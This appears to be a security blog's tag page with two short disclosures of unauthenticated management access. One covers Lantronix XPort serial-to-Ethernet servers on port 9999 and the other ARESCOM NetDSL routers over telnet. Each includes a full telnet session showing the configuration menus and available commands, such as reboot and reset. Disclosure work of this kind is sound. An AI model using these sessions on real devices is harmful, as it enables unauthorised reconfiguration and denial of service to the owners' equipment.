Posts Tagged ‘Authentication’

Lantronix xDirect Serial-to-Ethernet Server / XPort Unauthenticated Access

May 4, 2015

The Lantronix xDirect Serial-to-Ethernet device server allows unauthenticated access to TCP port 9999 which lets an attacker configure the device, gain information about and disable services resulting in a denial of service. For the device tested it was running XPort 6.6.0.2.

df:/tmp/ # telnet 192.168.1.10
Trying 192.168.1.10…
Connected to 192.168.1.10.
Escape character is ‘^]’.

MAC address 00204AC975EE
Software version V6.6.0.2 (080926) XPTEXE

Press Enter for Setup Mode

*** basic parameters
Hardware: Ethernet TPI
IP addr 192.168.1.10, gateway 192.168.1.1,netmask 255.255.255.0
DNS Server not set

*** Security
SNMP is enabled
SNMP Community Name: public
Telnet Setup is enabled
TFTP Download is enabled
Port 77FEh is enabled
Web Server is enabled
Web Setup is enabled
ECHO is disabled
Enhanced Password is disabled
Port 77F0h is enabled

*** Channel 1
Baudrate 38400, I/F Mode 4C, Flow 00
Port 10001
Connect Mode : C0
Send ‘+++’ in Modem Mode enabled
Show IP addr after ‘RING’ enabled
Auto increment source port disabled
Remote IP Adr: — none —, Port 00000
Disconn Mode : 00
Flush Mode : 00

*** Expert
TCP Keepalive : 45s
ARP cache timeout: 600s
CPU performance: Regular
Monitor Mode @ bootup : enabled
RS485 tx enable : active low
HTTP Port Number : 80
SMTP Port Number : 25
MTU Size: 1400
Alternate MAC: disabled
Ethernet connection type: auto-negotiate

*** E-mail
Mail server: 0.0.0.0
Unit :
Domain :
Recipient 1:
Recipient 2:

– Trigger 1
Serial trigger input: disabled
Channel: 1
Match: 00,00
Trigger input1: X
Trigger input2: X
Trigger input3: X
Message :
Priority: L
Min. notification interval: 1 s
Re-notification interval : 0 s

– Trigger 2
Serial trigger input: disabled
Channel: 1
Match: 00,00
Trigger input1: X
Trigger input2: X
Trigger input3: X
Message :
Priority: L
Min. notification interval: 1 s
Re-notification interval : 0 s

– Trigger 3
Serial trigger input: disabled
Channel: 1
Match: 00,00
Trigger input1: X
Trigger input2: X
Trigger input3: X
Message :
Priority: L
Min. notification interval: 1 s
Re-notification interval : 0 s

Change Setup:
0 Server
1 Channel 1
3 E-mail
5 Expert
6 Security
7 Defaults
8 Exit without save
9 Save and exit Your choice ? 6

Disable SNMP (N) ?

SNMP Community Name (public):

Disable Telnet Setup (N) ?

Disable TFTP Firmware Update (N) ?

Disable Port 77FEh (N) ?

Disable Web Server (N) ?

Disable Web Setup (N) ?

Disable ECHO ports (Y) ?

Enable Enhanced Password (N) ?

Disable Port 77F0h (N) ?

Change Setup:
0 Server
1 Channel 1
3 E-mail
5 Expert
6 Security
7 Defaults
8 Exit without save
9 Save and exit Your choice ? 8

exiting without save !
Connection closed by foreign host.
df:/tmp/ #

Advertisements

ARESCOM NetDSL Routers Unauthenticated Telnet Access

October 25, 2013

From an older saved Shodan search it looks like ARESCOM routers don’t require authentication for telnet! You can do a lot of commands including reboot, disconnect from the ISP and more!

Confirmed:
Model: NDS1260HE-TLI (Hardware) Version: 6.0.27 (Software version)
Model: ND1060VE-TLI (Hardware) Version: 5.3.21B (Software version)

df:~ # telnet 1.2.3.4
Trying 1.2.3.4…
Connected to 1.2.3.4.
Escape character is ‘^]’.

NDS1260HE-TLI Copyright by ARESCOM 2002

Login Success!
NetDSL>?

******* Console Help Menu *******
Available Command:

add add objects in table
connect start the connection
delete delete objects in table
disconnect disconnect modem connection
help display this menu again
quit quit the system
reboot reboot the router
reset reset the configuration, and reboot
save save the configuration
set set system parameters
show display system status
test system test
upgrade upgrade the firmware via FTP, TFTP and XMODEM

NetDSL>show sysinfo

Vendor: Arescom
Model: NDS1260HE-TLI (Hardware)
Version: 6.0.27 (Software version)
UpTime: 0293:28 (hh:mm)

NetDSL>